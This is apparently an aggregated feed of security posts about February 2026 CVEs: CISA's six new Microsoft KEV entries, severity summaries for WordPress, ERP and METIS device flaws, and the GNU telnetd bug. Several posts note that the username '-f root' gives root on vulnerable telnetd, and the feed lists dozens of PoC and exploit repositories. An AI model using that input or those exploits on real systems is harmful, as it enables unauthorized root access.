⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21525
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🔐 CVE-2026-21525
CVE-2026-21525
Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.
📊 CVSS Score: 6.2
⚠️ Severity: Medium
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21525
🛡️ CWE: CWE-476
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21525
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21525
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-11T15:40:42.937000
6 posts
62 repos
https://github.com/m3ngx1ng/cve_2026_24061_cli
https://github.com/obrunolima1910/obrunolima1910.github.io
https://github.com/BrainBob/CVE-2026-24061
https://github.com/yanxinwu946/CVE-2026-24061--telnetd
https://github.com/infat0x/CVE-2026-24061
https://github.com/franckferman/CVE_2026_24061_PoC
https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-
https://github.com/ridpath/Terrminus-CVE-2026-2406
https://github.com/r00tuser111/CVE-2026-24061
https://github.com/hilwa24/CVE-2026-24061
https://github.com/Good123321-bot/CVE-2026-24061-POC
https://github.com/LucasPDiniz/CVE-2026-24061
https://github.com/Good123321-bot/good123321-bot.github.io
https://github.com/Chocapikk/CVE-2026-24061
https://github.com/xuemian168/CVE-2026-24061
https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd
https://github.com/madfxr/Twenty-Three-Scanner
https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector
https://github.com/leonjza/inetutils-telnetd-auth-bypass
https://github.com/ibrahmsql/CVE-2026-24061-PoC
https://github.com/shivam-bathla/CVE-2026-24061-setup
https://github.com/JayGLXR/CVE-2026-24061-POC
https://github.com/punitdarji/telnetd-cve-2026-24061
https://github.com/parameciumzhang/Tell-Me-Root
https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root
https://github.com/Moxxic1/moxxic1.github.io
https://github.com/SeptembersEND/CVE--2026-24061
https://github.com/TryA9ain/CVE-2026-24061
https://github.com/scumfrog/cve-2026-24061
https://github.com/Moxxic1/Tell-Me-Root
https://github.com/hackingyseguridad/root
https://github.com/typeconfused/CVE-2026-24061
https://github.com/monstertsl/CVE-2026-24061
https://github.com/Alter-N0X/CVE-2026-24061-POC
https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061
https://github.com/z3n70/CVE-2026-24061
https://github.com/novitahk/Exploit-CVE-2026-24061
https://github.com/Lingzesec/CVE-2026-24061-GUI
https://github.com/Parad0x7e/CVE-2026-24061
https://github.com/cumakurt/tscan
https://github.com/ms0x08-dev/CVE-2026-24061-POC
https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061
https://github.com/balgan/CVE-2026-24061
https://github.com/obrunolima1910/CVE-2026-24061
https://github.com/midox008/CVE-2026-24061
https://github.com/Ali-brarou/telnest
https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061
https://github.com/Gabs-hub/CVE-2026-24061_Lab
https://github.com/XsanFlip/CVE-2026-24061-Scanner
https://github.com/SafeBreach-Labs/CVE-2026-24061
https://github.com/0x7556/CVE-2026-24061
https://github.com/duy-31/CVE-2026-24061---telnetd
https://github.com/Mefhika120/Ashwesker-CVE-2026-24061
https://github.com/Mr-Zapi/CVE-2026-24061
https://github.com/h3athen/CVE-2026-24061
https://github.com/cyberpoul/CVE-2026-24061-POC
https://github.com/lavabyte/telnet-CVE-2026-24061
https://github.com/buzz075/CVE-2026-24061
https://github.com/killsystema/scan-cve-2026-24061
https://github.com/SystemVll/CVE-2026-24061
https://github.com/X-croot/CVE-2026-24061_POC
https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester
I'm just reading this GNU telnetd CVE from last month. I did not realize that telnet was still a thing, but it turns out anybody could provide a username of "-f root" and, boom, they had root. The vulnerability existed for 11 years. *Wow*. https://www.cve.org/CVERecord?id=CVE-2026-24061
##I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep inside…
The day the telnet died
On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.
https://www.labs.greynoise.io/grimoire/2026-02-10-telnet-falls-silent/
##~/CVE/CVE-2026-24061_telnetd
Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...
🔗️ [Lobsec] https://link.is.it/6L9jY6
##I'm just reading this GNU telnetd CVE from last month. I did not realize that telnet was still a thing, but it turns out anybody could provide a username of "-f root" and, boom, they had root. The vulnerability existed for 11 years. *Wow*. https://www.cve.org/CVERecord?id=CVE-2026-24061
##I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep inside…
The day the telnet died
On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.
https://www.labs.greynoise.io/grimoire/2026-02-10-telnet-falls-silent/
##~/CVE/CVE-2026-24061_telnetd
Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...
🔗️ [Lobsec] https://link.is.it/6L9jY6
##updated 2026-02-11T15:38:13.670000
12 posts
🟠 CVE-2026-21513 - High (8.8)
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21513/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21513
CVE-2026-21513
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21513
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21513
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21513
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🟠 CVE-2026-21513 - High (8.8)
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21513/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21513
CVE-2026-21513
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21513
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21513
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21513
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-11T15:27:26.370000
2 posts
🔴 CVE-2025-8025 - Critical (9.8)
Missing Authentication for Critical Function, Improper Access Control vulnerability in Dinosoft Business Solutions Dinosoft ERP allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Dinosoft ERP: from < 3.0.1 throug...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-8025/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-8025 - Critical (9.8)
Missing Authentication for Critical Function, Improper Access Control vulnerability in Dinosoft Business Solutions Dinosoft ERP allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Dinosoft ERP: from < 3.0.1 throug...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-8025/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T15:27:26.370000
2 posts
🟠 CVE-2026-0910 - High (8.8)
The wpForo Forum plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.4.13 via deserialization of untrusted input in the 'wpforo_display_array_data' function. This makes it possible for authenticated a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0910/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-0910 - High (8.8)
The wpForo Forum plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.4.13 via deserialization of untrusted input in the 'wpforo_display_array_data' function. This makes it possible for authenticated a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0910/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T15:27:26.370000
2 posts
🔴 CVE-2025-8668 - Critical (9.4)
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in E-Kalite Software Hardware Engineering Design and Internet Services Industry and Trade Ltd. Co. Turboard allows Reflected XSS.This issue a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-8668/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-8668 - Critical (9.4)
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in E-Kalite Software Hardware Engineering Design and Internet Services Industry and Trade Ltd. Co. Turboard allows Reflected XSS.This issue a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-8668/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T15:27:26.370000
2 posts
🔴 CVE-2025-12059 - Critical (9.8)
Insertion of Sensitive Information into Externally-Accessible File or Directory vulnerability in Logo Software Industry and Trade Inc. Logo j-Platform allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Logo ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-12059/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-12059 - Critical (9.8)
Insertion of Sensitive Information into Externally-Accessible File or Directory vulnerability in Logo Software Industry and Trade Inc. Logo j-Platform allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Logo ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-12059/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T15:27:26.370000
2 posts
🟠 CVE-2025-48503 - High (7.8)
A DLL hijacking vulnerability in the AMD Software Installer could allow an attacker to achieve privilege escalation potentially resulting in arbitrary code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-48503/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-48503 - High (7.8)
A DLL hijacking vulnerability in the AMD Software Installer could allow an attacker to achieve privilege escalation potentially resulting in arbitrary code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-48503/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T15:27:26.370000
2 posts
🟠 CVE-2026-2250 - High (7.5)
The /dbviewer/ web endpoint in METIS WIC devices is exposed without authentication. A remote attacker can access and export the internal telemetry SQLite database containing sensitive operational data. Additionally, the application is configured w...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2250/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2250 - High (7.5)
The /dbviewer/ web endpoint in METIS WIC devices is exposed without authentication. A remote attacker can access and export the internal telemetry SQLite database containing sensitive operational data. Additionally, the application is configured w...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2250/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T15:27:26.370000
2 posts
1 repos
🔴 CVE-2026-2249 - Critical (9.8)
METIS DFS devices (versions <= oscore 2.1.234-r18) expose a web-based shell at the /console endpoint that does not require authentication. Accessing this endpoint allows a remote attacker to execute arbitrary operating system commands with ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2249/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2249 - Critical (9.8)
METIS DFS devices (versions <= oscore 2.1.234-r18) expose a web-based shell at the /console endpoint that does not require authentication. Accessing this endpoint allows a remote attacker to execute arbitrary operating system commands with ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2249/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T15:27:26.370000
2 posts
1 repos
🔴 CVE-2026-2248 - Critical (9.8)
METIS WIC devices (versions <= oscore 2.1.234-r18) expose a web-based shell at the /console endpoint that does not require authentication. Accessing this endpoint allows a remote attacker to execute arbitrary operating system commands with root...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2248/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2248 - Critical (9.8)
METIS WIC devices (versions <= oscore 2.1.234-r18) expose a web-based shell at the /console endpoint that does not require authentication. Accessing this endpoint allows a remote attacker to execute arbitrary operating system commands with root...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2248/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T15:27:26.370000
1 posts
1 repos
https://github.com/Z3YR0xX/CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0
⚠️ HIGH severity: CVE-2026-1560 in Lazy Blocks (WordPress, ≤4.2.0) lets Contributor+ users run arbitrary code via improper code generation (CWE-94). No public exploits yet — restrict roles and monitor activity! https://radar.offseq.com/threat/cve-2026-1560-cwe-94-improper-control-of-generatio-655d2091 #OffSeq #WordPress #RCE #Vuln
##updated 2026-02-11T15:27:26.370000
2 posts
3 repos
https://github.com/itsismarcos/Exploit-CVE-2026-1357
🚨 CRITICAL: CVE-2026-1357 impacts WPvivid Backup & Migration (all versions). Unauthenticated file upload via directory traversal enables RCE. Disable plugin or restrict access immediately! https://radar.offseq.com/threat/cve-2026-1357-cwe-434-unrestricted-upload-of-file--8f35918d #OffSeq #WordPress #Infosec #CVE20261357
##A critical arbitrary file upload vulnerability (CVE-2026-1357, CVSS 9.8) was discovered in the WPvivid Backup & Migration plugin, which is installed on over 800,000 WordPress sites.
The flaw allows unauthenticated attackers to upload arbitrary files, potentially achieving remote code execution and full site takeover.
Update to version 0.9.124. Wordfence Premium users received firewall protection on January 22.
